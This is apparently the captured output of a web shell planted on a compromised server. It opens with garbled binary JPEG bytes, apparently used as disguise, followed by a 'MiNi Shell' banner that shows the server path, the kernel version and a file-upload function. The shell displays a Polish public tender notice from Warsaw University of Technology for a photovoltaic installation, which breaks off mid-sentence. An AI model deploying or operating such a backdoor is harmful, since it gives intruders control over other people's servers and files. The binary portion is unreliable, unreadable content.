JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20251126/

Linux 9dbcd5f6333d 5.15.0-153-generic #163-Ubuntu SMP Thu Aug 7 16:37:18 UTC 2025 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20251126/0055788001-N-2025.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Roboty budowlane<br/> Wykonanie robót budowlanych polegających na zaprojektowaniu i budowie instalacji urządzeń fotowoltaicznych - „Instalacja fotowoltaiczna – CEZAMAT PW” </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">POLITECHNIKA WARSZAWSKA</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 000001554</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">PLAC POLITECHNIKI 1</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Warszawa</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">00-661</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">mazowieckie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL911 - Miasto Warszawa</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">zamowienia.cezamat@pw.edu.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">https://www.pw.edu.pl</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - uczelnia publiczna</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Edukacja</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Wykonanie robót budowlanych polegających na zaprojektowaniu i budowie instalacji urządzeń fotowoltaicznych - „Instalacja fotowoltaiczna – CEZAMAT PW” </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-710eda22-d061-43d0-9695-30169aa51b65</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2025/BZP 00557880</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2025-11-26</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2025/BZP 00035324/53/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.1.82 Zaprojektowanie i wykonania inetalacji urządzeń fotowoltaicznych</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.15.) Nazwa projektu lub programu</h3> <p class="mb-0"> Umowa nr KPOD.03.12-IP.05-0095/24 </p> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://platformazakupowa.pl/pn/pw_edu/proceedings <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">4.1. W postępowaniu o udzielenie zamówienia komunikacja między Zamawiającym a<br/>Wykonawcami odbywa się przy użyciu środków komunikacji elektronicznej:<br/>a) platformy zakupowej OpenNexus:<br/>https://platformazakupowa.pl/pn/pw_edu/proceedings<br/>b) poczty elektronicznej (zamowienia.cezamat@pw.edu.pl).<br/>4.2. Przystępując do postępowania Wykonawca akceptuje warunki korzystania z platformy zakupowej, określone w Regulaminie<br/>zamieszczonym na stronie internetowej, w zakładce „Regulamin” (https://platformazakupowa.pl/strona/1-regulamin). Jednocześnie<br/>Wykonawca zapoznał się i stosuje zapisy Instrukcji składania ofert (https://platformazakupowa.pl/strona/45-instrukcje).<br/>4.3. W celu złożenia oferty nie ma konieczności założenia konta użytkownika na platformie zakupowej. Jeżeli Wykonawca nie ma<br/>konta na platformie zakupowej i składa ofertę bez zakładania konta, Wykonawca ma obowiązek potwierdzić, do upływu terminu<br/>składania ofert, adres mailowy podany w formularzu, poprzez kliknięcie w link aktywacyjny.</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">4.4. Wymagania techniczne i<br/>organizacyjne wysyłania i odbierania dokumentów elektronicznych, elektronicznych kopii dokumentów i oświadczeń oraz informacji<br/>przekazywanych przy ich użyciu opisane zostały w Regulaminie zamieszczonym na stronie internetowej platformy<br/>(https://platformazakupowa.pl/strona/1-regulamin).<br/>4.5. W celu korzystania z platformy zakupowej Wykonawca musi dysponować:<br/>a) stałym dostępem do sieci Internet o gwarantowanej przepustowości nie mniejszej niż 512 kb/s,<br/>b) komputerem klasy PC lub MAC, o konfiguracji: pamięć min. 2 GB Ram, procesor Intel IV 2 GHZ lub jego nowsza wersja, jeden z<br/>systemów operacyjnych - MS Windows 7, Mac Os x 10.4, Linux lub ich nowsze wersje,<br/>c) zainstalowaną dowolną przeglądarką internetową, w przypadku Internet Explorer co najmniej wersja 10.0,<br/>d) włączoną obsługą JavaScript,<br/>e) zainstalowanym programem Adobe Acrobat Reader lub innym obsługującym format plików .pdf.<br/>4.6. Szyfrowanie na platformie zakupowej odbywa się za pomocą protokołu TLS 1.3.<br/>4.7. Na platformie zakupowej występuje limit objętości plików lub spakowanych folderów w zakresie całej oferty lub wniosku do ilości<br/>10 plików lub spakowanych folderów przy maksymalnej wielkości 150 MB.<br/>4.8. Formaty plików wykorzystywanych przez wykonawców powinny być zgodne z Rozporządzeniem Rady Ministrów z dnia 12<br/>kwietnia 2012 r. w sprawie Krajowych Ram Interoperacyjności, minimalnych wymagań dla rejestrów publicznych i wymiany informacji<br/>w postaci elektronicznej oraz minimalnych wymagań dla systemów teleinformatycznych.<br/>4.9. Zamawiający rekomenduje wykorzystanie formatów: .pdf .doc .xls .jpg (.jpeg) ze szczególnym wskazaniem na .pdf. W celu<br/>ewentualnej kompresji danych Zamawiający rekomenduje wykorzystanie jednego z formatów: .zip lub .7Z. Do formatów uznanych za<br/>powszechne a nie występujących w rozporządzeniu należą: .rar .gif .bmp .numbers .pages. Dokumenty złożone w takich plikach<br/>zostaną potraktowane za złożone nieskutecznie.<br/>4.10. Dokumenty podpisywane kwalifikowanym podpisem elektronicznym lub w postaci elektronicznej opatrzonej podpisem<br/>zaufanym lub podpisem osobistym:<br/>a) w formacie „pdf” zaleca się podpis w formacie PAdES,<br/>b) w formacie innym niż „pdf” zaleca się podpisywać formatem XAdES.<br/>Zaleca się stosowanie podpisu wewnętrznego polegającego na tym, że jest zapisany łącznie z podpisywanym dokumentem (tworzą<br/>jeden plik), a nie oddzielnie (plik podpisywany i plik podpisu).<br/>4.11. W postępowaniu o udzielenie zamówienia komunikacja pomiędzy Zamawiającym a Wykonawcami w zakresie składania<br/>dokumentów, oświadczeń, wniosków (innych niż oferty - które mogą być przekazywane jedynie w sposób wskazany w pkt XIV IDW)<br/>odbywa się elektronicznie za pośrednictwem:<br/>a) dedykowanego formularza: „Formularz składania oferty” dostępnego na platformie zakupowej;<br/>b) poczty elektronicznej na adres poczty Zamawiającego:<br/>zamowienia@pw.edu.pl<br/>Zamawiający przekazuje dokumenty na adres poczty elektronicznej wskazany w formularzu ofertowym Wykonawcy, na co<br/>Wykonawca wyraża zgodę wskazując ten adres w ofercie i zobowiązuje się do utrzymania jego funkcjonalności przez czas trwania<br/>postępowania. Domniemywa się, że dokumenty, oświadczenia i wnioski przekazane na adres poczty elektronicznej wskazany w<br/>formularzu ofertowym zostały doręczone skutecznie, a Wykonawca zapoznał się z ich treścią.<br/>4.12. W przypadku korzystania z rozwiązania wskazanego w pkt 4.11 lit. a) dokumenty elektroniczne, składane są przez Wykonawcę<br/>za pomocą platformy zakupowej.<br/>4.13. Zamawiający dopuszcza również możliwość składania dokumentów elektronicznych za pomocą poczty elektronicznej, na<br/>wskazany w pkt 4.11 lit. b) adres poczty elektronicznej.<br/>4.14. We wszelkiej korespondencji związanej z niniejszym postępowaniem Zamawiający i Wykonawcy posługują się numerem<br/>ogłoszenia (BZP, numerem postępowania).</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">Zgodnie z art. 13 ust. 1 i 2 rozporządzenia Parlamentu Europejskiego i Rady (UE)<br/>2016/679 z dnia 27 kwietnia 2016 r. w sprawie ochrony osób fizycznych w związku z przetwarzaniem danych osobowych i w sprawie<br/>swobodnego przepływu takich danych oraz uchylenia dyrektywy 95/46/WE (ogólne rozporządzenie o ochronie danych) (Dz. Urz. UE<br/>L 119 z 04.05.2016, str. 1), dalej „RODO”, informuję, że:<br/>􀀀 administratorem Pani/Pana danych osobowych jest Politechnika Warszawska, Plac Politechniki 1, 00-661 Warszawa;<br/>􀀀 administrator wyznaczył Inspektora Ochrony Danych nadzorującego prawidłowość przetwarzania danych osobowych, z którym<br/>można skontaktować pod adresem mailowym: iod@pw.edu.pl;<br/>􀀀 Pani/Pana dane osobowe przetwarzane będą na podstawie art. 6 ust. 1 lit. c RODO w celu związanym z powyższym<br/>postępowaniem;<br/>􀀀 odbiorcami Pani/Pana danych osobowych będą osoby lub podmioty, którym udostępniona zostanie dokumentacja postępowania w<br/>oparciu o art. 18 oraz art. 74 ustawy z dnia 11 września 2019 r. Prawo zamówień publicznych, dalej „ustawa” lub „PZP”;<br/>􀀀 Pani/Pana dane osobowe będą przechowywane, zgodnie z art. 78 ust. 1 ustawy, przez okres 4 lat od dnia zakończenia<br/>postępowania o udzielenie zamówienia, a jeżeli czas trwania umowy przekracza 4 lata, okres przechowywania obejmuje cały czas<br/>trwania umowy;<br/>􀀀 obowiązek podania przez Panią/Pana danych osobowych bezpośrednio Pani/Pana dotyczących jest wymogiem ustawowym<br/>określonym w przepisach ustawy, związanym z udziałem w postępowaniu o udzielenie zamówienia publicznego; konsekwencje<br/>niepodania określonych danych wynikają z ustawy;<br/>􀀀 w odniesieniu do Pani/Pana danych osobowych decyzje nie będą podejmowane w sposób zautomatyzowany, stosowanie do art.<br/>22 RODO;<br/>􀀀 posiada Pani/Pan:<br/> na podstawie art. 15 RODO prawo dostępu do danych osobowych Pani/Pana dotyczących;<br/> na podstawie art. 16 RODO prawo do sprostowania Pani/Pana danych osobowych;<br/> na podstawie art. 18 RODO prawo żądania od administratora ograniczenia przetwarzania danych osobowych z zastrzeżeniem<br/>przypadków, o których mowa w art. 18 ust. 2 RODO;<br/> prawo do wniesienia skargi do Prezesa Urzędu Ochrony Danych Osobowych, gdy uzna Pani/Pan, że przetwarzanie danych<br/>osobowych Pani/Pana dotyczących narusza przepisy RODO;</span></h3> <h3 class="mb-0">3.16.) RODO (ograniczenia stosowania): <span class="normal">􀀀 nie przysługuje Pani/Panu:<br/> w związku z art. 17 ust. 3 lit. b, d lub e RODO prawo do usunięcia danych osobowych;<br/> prawo do przenoszenia danych osobowych, o którym mowa w art. 20 RODO;<br/> na podstawie art. 21 RODO prawo sprzeciwu, wobec przetwarzania danych osobowych, gdyż podstawą prawną przetwarzania<br/>Pani/Pana danych osobowych jest art. 6 ust. 1 lit. c RODO.</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2><h3 class="mb-0">4.1.) Informacje ogólne odnoszące się do przedmiotu zamówienia.</h3> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">CEZAMAT/ZP47/2025</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Roboty budowlane</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Przedmiotem zamówienia jest wykonanie robót budowlanych w formule zaprojektuj i wybuduj pod nazwą: Wykonanie robót<br/>budowlanych polegające na zaprojektowaniu i budowie instalacji urządzeń fotowoltaicznych na budynkach Centrum<br/>Zaawansowanych Materiałów i Technologii Politechniki Warszawskiej </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">71323100-9 - Usługi projektowania systemów zasilania energią elektryczną</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">71220000-6 - Usługi projektowania architektonicznego</p> <p class="mb-0">71247000-1 - Nadzór nad robotami budowlanymi</p> <p class="mb-0">45000000-7 - Roboty budowlane</p> <p class="mb-0">45300000-0 - Roboty instalacyjne w budynkach</p> <p class="mb-0">45310000-3 - Roboty instalacyjne elektryczne</p> <p class="mb-0">45261215-4 - Pokrywanie dachów panelami ogniw słonecznych</p> <p class="mb-0">09331200-0 - Słoneczne moduły fotoelektryczne</p> <p class="mb-0">09332000-5 - Instalacje słoneczne</p> <p class="mb-0">38424000-3 - Urządzenia pomiarowe i sterujące</p> <p class="mb-0">45111200-0 - Roboty w zakresie przygotowania terenu pod budowę i roboty ziemne</p> <p class="mb-0">45260000-7 - Roboty w zakresie wykonywania pokryć i konstrukcji dachowych i inne podobne roboty specjalistycze</p> <p class="mb-0">45450000-6 - Roboty budowlane wykończeniowe, pozostałe</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <!-- realizacja w dniach --> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">6 miesiące</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert</h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Zamawiający dokona całkowitej oceny końcowej ofert, według poniższego wzoru:<br/>O = C +G+S+T<br/>O – suma punktów uzyskana za wszystkie kryteria wymienione wyżej;<br/>C – ocena punktowa uzyskana za kryterium „cena brutto za wykonanie przedmiotu zamówienia”;<br/>G – ocena punktowa uzyskana za kryterium „okres gwarancji”<br/>S – ocena punktowa uzyskana za kryterium „czas reakcji serwisu”<br/>T – ocena punktowa uzyskana za kryterium „ocena techniczna”</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal"> Punktowo </span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: </h3> inne. <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Okres gwarancji „G”-– waga 15% z podziałem na podkryteria: G1 – okres gwarancji na roboty budowlane – waga 5% G2 – okres gwarancji na moduły (panele) fotowoltaiczne – waga 5% G3 – okres gwarancji na falownik – waga 5%</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">15</span></h3> <h3 class="mb-0">Kryterium 3</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: </h3> serwis posprzedażny, pomoc techniczna, warunki dostawy takich jak termin, sposób lub czas dostawy, oraz okresu realizacji. <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Czas reakcja serwisu „S”</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">10</span></h3> <h3 class="mb-0">Kryterium 4</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: </h3> inne. <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Ocena techniczna „T” - waga 15% z podziałem na podkryteria: T1 – Sprawność modułu – waga 5% T2 – Technologia wykonania – waga 10%</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">15</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.3.11.) Określenie aspektów społecznych, środowiskowych lub innowacyjnych, etykiet lub rachunku kosztów cyklu życia w odniesieniu do kryteriów oceny ofert: </h3> <p class="mb-0">zgodnie z art. 242 ust. 2 ustawy - aspekty środowiskowe</p> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> O udzielenie zamówienia publicznego może/mogą się ubiegać Wykonawca/Wykonawcy, który/którzy spełnia/spełniają<br/>warunki udziału w postępowaniu w zakresie:<br/>- zdolności do występowania w obrocie gospodarczym – Zamawiający nie formułuje szczegółowego warunku;<br/>- uprawnień do prowadzenia określonej działalności gospodarczej lub zawodowej, o ile wynika to z odrębnych przepisów -<br/>Zamawiający nie formułuje szczegółowego warunku;<br/>- sytuacji ekonomicznej lub finansowej – Zamawiający nie formułuje szczegółowego warunku;<br/>- zdolności technicznej lub zawodowej :<br/>Zamawiający uzna warunek za spełniony w przypadku wykazania przez Wykonawcę, że w okresie ostatnich 5 lat przed<br/>upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wykonał należycie co<br/>najmniej 2 zamówienia polegające na zaprojektowaniu i budowie instalacji fotowoltaicznej o mocy zainstalowanej<br/>elektrycznej nie mniejszej niż 500 kWp, o wartości 1.200.000,00 zł brutto każde zamówienie.<br/>Zamawiający uzna warunek za spełniony w przypadku wykazania przez Wykonawcę, dysponuje lub będzie dysponował<br/>osobami posiadającymi uprawnienia budowlane do sprawowania samodzielnych funkcji technicznych w budownictwie bez<br/>ograniczeń w zakresie projektowania oraz kierowania robotami budowlanymi w specjalności instalacyjnej w zakresie<br/>instalacji i urządzeń elektrycznych i elektroenergetycznych, posiadającej świadectwo kwalifikacyjne, uprawniające do<br/>zajmowania się eksploatacją urządzeń, instalacji i sieci na stanowisku dozoru lub eksploatacji - w zakresie niezbędnym dla<br/>montowanej instalacji (wydawane na podstawie rozporządzenia Ministra Klimatu I Środowiska z dnia 1 lipca 2022 r. w<br/>sprawie szczegółowych zasad stwierdzania posiadania kwalifikacji przez osoby zajmujące się eksploatacją urządzeń,<br/>instalacji i sieci, z co najmniej 3 - letnim doświadczeniem w uzyskanej specjalności:<br/>1) Kierownik budowy – posiadający uprawnienie do kierowania robotami budowlanymi w specjalności instalacyjnej w<br/>zakresie instalacji i urządzeń elektrycznych i elektroenergetycznych,<br/>2) Kierownik robót elektrycznych – posiadający uprawnienie do kierowania robotami budowlanymi w specjalności<br/>instalacyjnej w zakresie instalacji i urządzeń elektrycznych,<br/>3) Instalator wykonujący montaż - posiadający aktualny certyfikat instalatora odnawialnych źródeł energii potwierdzający<br/>kwalifikacje do instalowania odnawialnych źródeł energii w postaci systemów fotowoltaicznych wydany na podstawie art.<br/>136 i art. 145 ustawy OZE,<br/>4) Projektant instalacji elektrycznych - posiadający uprawnienia budowlane do projektowania w branży elektrycznej, w<br/>specjalności instalacyjnej w zakresie sieci, instalacji i urządzeń elektrycznych i elektroenergetycznych bez ograniczeń.<br/>Zamawiając, określając wymogi dla osób w zakresie posiadanych uprawnień budowlanych wymaga uprawnień w<br/>rozumieniu ustawy z dn. 7 lipca 1994 r. Prawo budowlane oraz Rozporządzenia Ministra Inwestycji i Rozwoju z dn. 29<br/>kwietnia 2019 r. w sprawie przygotowania zawodowego do wykonywania samodzielnych funkcji technicznych w<br/>budownictwie (Dz. U. poz. 831). Zamawiający zaakceptuje uprawnienia budowlane odpowiadające wymaganym<br/>uprawnieniom, które zostały wydane na podstawie wcześniej obowiązujących przepisów oraz odpowiadające im<br/>uprawnienia wydane obywatelom państwa członkowskiego Unii Europejskiej oraz osobom będącym obywatelami innych<br/>państw, którym na podstawie umów międzynarodowych lub przepisów prawa Unii Europejskiej przysługuje prawo podjęcia<br/>zatrudnienia na terytorium Rzeczypospolitej Polskiej, z zastrzeżeniem art. 12a oraz innych przepisów ustawy PB oraz<br/>ustawy z dnia 22 grudnia 2015 r. o zasadach uznawania kwalifikacji zawodowych nabytych w państwach członkowskich Unii<br/>Europejskiej.<br/>Zamawiający określając wymogi dla instalatorów instalacji odnawialnych źródeł energii w zakresie certyfikatu<br/>potwierdzającego posiadanie przez instalatora kwalifikacji do instalowania danego rodzaju instalacji odnawialnego źródła<br/>energii, wymaga certyfikatu w rozumieniu ustawy z dn. 10 lutego 2015 r. o odnawialnych źródłach energii. Zamawiający<br/>zaakceptuje certyfikaty odpowiadające wymaganym, które zostały wydane na podstawie wcześniej obowiązujących<br/>przepisów oraz odpowiadające im uprawnienia wydane obywatelom państwa członkowskiego Unii Europejskiej oraz<br/>osobom będącym obywatelami innych państw, którym na podstawie umów międzynarodowych lub przepisów prawa Unii<br/>Europejskiej przysługuje prawo podjęcia zatrudnienia na terytorium Rzeczypospolitej 